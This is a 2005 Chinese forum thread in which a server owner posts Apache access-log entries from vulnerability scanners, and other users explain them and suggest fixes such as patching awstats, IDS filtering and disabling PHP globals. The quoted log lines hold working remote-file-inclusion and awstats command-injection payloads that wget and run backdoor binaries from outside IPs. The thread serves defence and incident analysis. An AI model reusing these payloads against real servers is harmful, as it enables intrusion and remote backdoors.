apache2 日志上有很多类似 GET /awstats/awstats.pl?configdir

jhuangjiahua · 发表于 2005-12-17 17:08:27

/var/log/apache2/access.log 里很多类似

213.133.118.196 - - [16/Dec/2005:22:22:38 +0800] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 372 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
213.133.118.196 - - [16/Dec/2005:22:22:40 +0800] "POST /xmlrpc.php HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

复制代码

211.155.132.10 - - [17/Dec/2005:00:51:30 +0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.155.132.10 - - [17/Dec/2005:00:51:31 +0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
213.58.148.5 - - [17/Dec/2005:01:00:12 +0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

复制代码

附件是 /var/log/apache2/access.log 和 /var/log/apache2/error.log

kissingwolf · 发表于 2005-12-17 20:40:15

1.你的服务器是否开启了用户public_html或是作为某人的虚拟主机？
如果没有请查看你的DocumentRoot的/Forums/admin/admin_styles.php 中是否有有害代码或是bug！如果没有估计你也没装webcvs和awstats ,可以看出这些只是扫漏洞程序遗留的足迹！
2.请求分析是这样的，来自213.133.118.196的某人想利用php的bug上传http://81.174.26.111/cmd.gif文件，应该是一个针对linux的程序或是就是shell，我们就当它是个shell! 下载来的目的是执行cd /tmp ; wget 216.15.209.4/criman ; chmod 744 criman ; ./criman YYY 。 huahua冰雪聪明，该知道他想做什么了吧！
3.下面的哪个也是一样！只是改了个名字叫listen了，不够隐蔽！其实不管是criman或是listen都是nc的变种，目的只有一个就是开个登录端口，nc上来！
4. 不用在意这种扫漏洞的日志，我一般会用脚本找出来然后发信给这个ip所属机构的管理员，提醒或警告他一下！

Yuri · 发表于 2005-12-17 22:11:06

用IDS过滤掉awstats/awstats.pl?configdir

kissingwolf · 发表于 2005-12-17 23:19:58

Post by Yuri
用IDS过滤掉awstats/awstats.pl?configdir

最新版的awstats已经解决了这个bug,无需担心！

blackwhite · 发表于 2005-12-18 00:30:30

如果别人尝试一个东西很多次，一般可能是这个地方有漏洞。所以要即使打补丁。

jhuangjiahua · 发表于 2005-12-18 00:39:54

谢谢狼头
谢谢 Yuri 兄

发信警告一下好了

hua@vgh:~$ whois 213.133.118.196
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%    To receive output for a database update, use the "-B" flag

% Information related to '213.133.118.192 - 213.133.118.207'

inetnum:       213.133.118.192 - 213.133.118.207
netname:       Objective-Microsystems-Net
descr:       Objective Microsystems OHG
country:       DE
admin-c:       DJ583-RIPE
tech-c:       HOAC1-RIPE
status:       ASSIGNED PA
mnt-by:       HOS-GUN
mnt-lower:    HOS-GUN
mnt-routes:    HOS-GUN
source:       RIPE # Filtered

role:          Hetzner Online AG - Contact Role
address:       Hetzner Online AG
address:       Industriestr. 6
address:       D-91710 Gunzenhausen
address:       Germany
phone:       +49 9831 61 00 61
fax-no:       +49 9831 61 00 62
e-mail:       ripe@hetzner.de
remarks:       *************************************************
remarks:       * For spam/abuse/security issues please contact *
remarks:       * abuse@hetzner.de ,  not  this  address    *
remarks:       *************************************************
remarks:
remarks:       *************************************************
remarks:       * Any questions on Peering please send to *
remarks:       *             peering@hetzner.de             *
remarks:       *************************************************
org:          ORG-HOA1-RIPE
admin-c:       MH375-RIPE
tech-c:       GM834-RIPE
tech-c:       RB1502-RIPE
tech-c:       SK2374-RIPE
tech-c:       ND762-RIPE
nic-hdl:       HOAC1-RIPE
mnt-by:       HOS-GUN
source:       RIPE # Filtered

person:    Dirk Jorda
address:    Objective Microsystems OHG
address:    Am Nussbaum 1
address:    65604 Elz
e-mail:    dirk.jorda@oms.de
phone:       +49 69 66554215
fax-no:    +49 69 66554216
mnt-by:    HOS-GUN
nic-hdl:    DJ583-RIPE
source:    RIPE # Filtered

% Information related to '213.133.96.0/19AS24940'

route:       213.133.96.0/19
descr:       HETZNER-RZ-NBG-BLK1
origin:    AS24940
mnt-by:    HOS-GUN
source:    RIPE # Filtered

hua@vgh:~$

konds · 发表于 2005-12-20 12:53:30

花花有做服务器了?尽量把php的globals OFF掉最好

jhuangjiahua · 发表于 2005-12-21 15:11:28

konds 兄好久不见

怎么不上 IRC 了？

konds · 发表于 2005-12-28 12:06:18

前一段出差了3个月.回来后妈又病了.然后又公司搬家.搞的都没时间碰机器了.你最近可好?

dancingpig · 发表于 2005-12-30 15:36:56

awstats是个perl的脚本程序

		自动登录	找回密码
密码			注册

apache2 日志上有很多类似 GET /awstats/awstats.pl?configdir

本帖子中包含更多资源